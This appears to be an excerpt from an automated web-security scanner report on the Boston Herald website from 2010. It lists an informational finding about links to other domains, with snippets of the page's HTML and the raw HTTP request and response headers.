<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="http://bostonherald.com/news/regional/view.bg?articleid=1294806&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="261" width="315" alt="Grim reality"></a>
...[SNIP]...
<a href="http://bostonherald.com/news/regional/view.bg?articleid=1294800&position=1"><img class="blog_tease" src="http://multimedia.heraldinteractive.com/images/20101107/stp/0b0f8e_stab_11082010.jpg" alt="GRIEVING: A friend hugs Shondell Davis, the aunt of the stabbing victim, in Roxbury yesterday."></a>
...[SNIP]...
<a href="http://bostonherald.com/news/politics/view.bg?articleid=1294798&srvc=news&position=2"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/4c267b_splash_11082010.jpg" alt="Staff photo illustration."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/news/politics/view.bg?articleid=1294798&format=comments&srvc=news&position=2">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Comments"><a
href="http://bostonherald.com/news/politics/view.bg?articleid=1294798&srvc=news&position=2">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif" alt="Comments"><a
href="http://bostonherald.com/news/politics/view.bg?articleid=1294798&srvc=news&position=2">
...[SNIP]...
<a href="http://bostonherald.com/news/regional/view.bg?articleid=1294801&srvc=news&position=3"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/0b646b_killer_11082010.jpg" alt="Robert &#x2018;Michele&#x2019; Kosilek."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/news/regional/view.bg?articleid=1294801&format=comments&srvc=news&position=3">
...[SNIP]...
<a href="http://bostonherald.com/news/regional/view.bg?articleid=1294810&srvc=news&position=4"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/f448d0_mbta_11082010.jpg" alt="ELEMENT-ARY: T riders brave the elements at a South End bus stop during a rain storm last week."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/news/regional/view.bg?articleid=1294810&format=comments&srvc=news&position=4">
...[SNIP]...
<a href="/news/police_logs/">
<img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif" alt="Boston Police Blotter" />
</a>
...[SNIP]...
<a href="/throwdown">
<img class="thumb" border="0" src="http://cache.heraldinteractive.com/images/version5.0/site_images/news/throwdown/FridayThrowdown0610_234x60.jpg" alt="Friday Throwdown" width="177" height="57" />
</a>
...[SNIP]...
<li style="margin:0 0 0 0">
<img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxDollars177.gif" alt="Your tax dollars at work" />
<div style="line-height:16px">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also">
...[SNIP]...
<a href="/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/srvc=news&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/55f979_petit.jpg" alt="Dr. William Petit leaves Superior Court in New Haven, Conn., Saturday, after the jury failed to reach a verdict on the penalty phase in the murder trial of Steven Hayes." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also">
...[SNIP]...
<a href="/news/politics/view/20101108monday_morning_briefing/srvc=news&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/721367_poli_07052010.jpg" alt="" /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/news/columnists/view/20101108funeral_homes_shouldnt_bury_the_living_too/format=comments&srvc=news&position=also">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also">
...[SNIP]...
<div id="rssBoxWhat">
                           <a target="_new" href="http://www.twitter.com">What is Twitter?</a>
...[SNIP]...
<div id="rssBoxWhat"><a href="http://www.feedburner.com/fb/a/feed101" taget="_new">What are RSS feeds?</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/news" target="_new">All News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/news/regional/" target="_new">Local News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/news/regional/politics/" target="_new">Local Politics</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/news/opinion/columnists/" target="_new">Columnists</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/news/opinion/" target="_new">Opinion</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/news/national/offbeat/" target="_new">Off Beat</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/news/national/" target="_new">National News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/news/national/politics/" target="_new">U.S. Politics</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/news/international/" target="_new">International</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/news/obituaries/" target="_new">Obituaries</a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_enews.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_mobil.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_news.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_home.gif">
        </a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/city_desk_wired">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/cityDeskWired.gif" alt="British fear-factor over Bay State jails" />
           British fear-factor over Bay State jails
           </a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/mediaBiz/">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/MediaBizBlog.gif" alt="Bob Lobel and Upton Bell get radio show" />
           Bob Lobel and Upton Bell get radio show
           </a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/lone_republican">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/theLoneRepublican.gif" alt="The Massachusetts House Gains" />
           The Massachusetts House Gains
           </a>
...[SNIP]...
<!-- // NDN Widget // -->
<iframe style="position: relative; margin-bottom: 14px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1294810"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101107/f448d0_mbta_11082010.jpg"></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

8.18. http://bostonherald.com/news/columnists/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/columnists/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news/columnists/?srvc=news&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:23:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 62061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/ja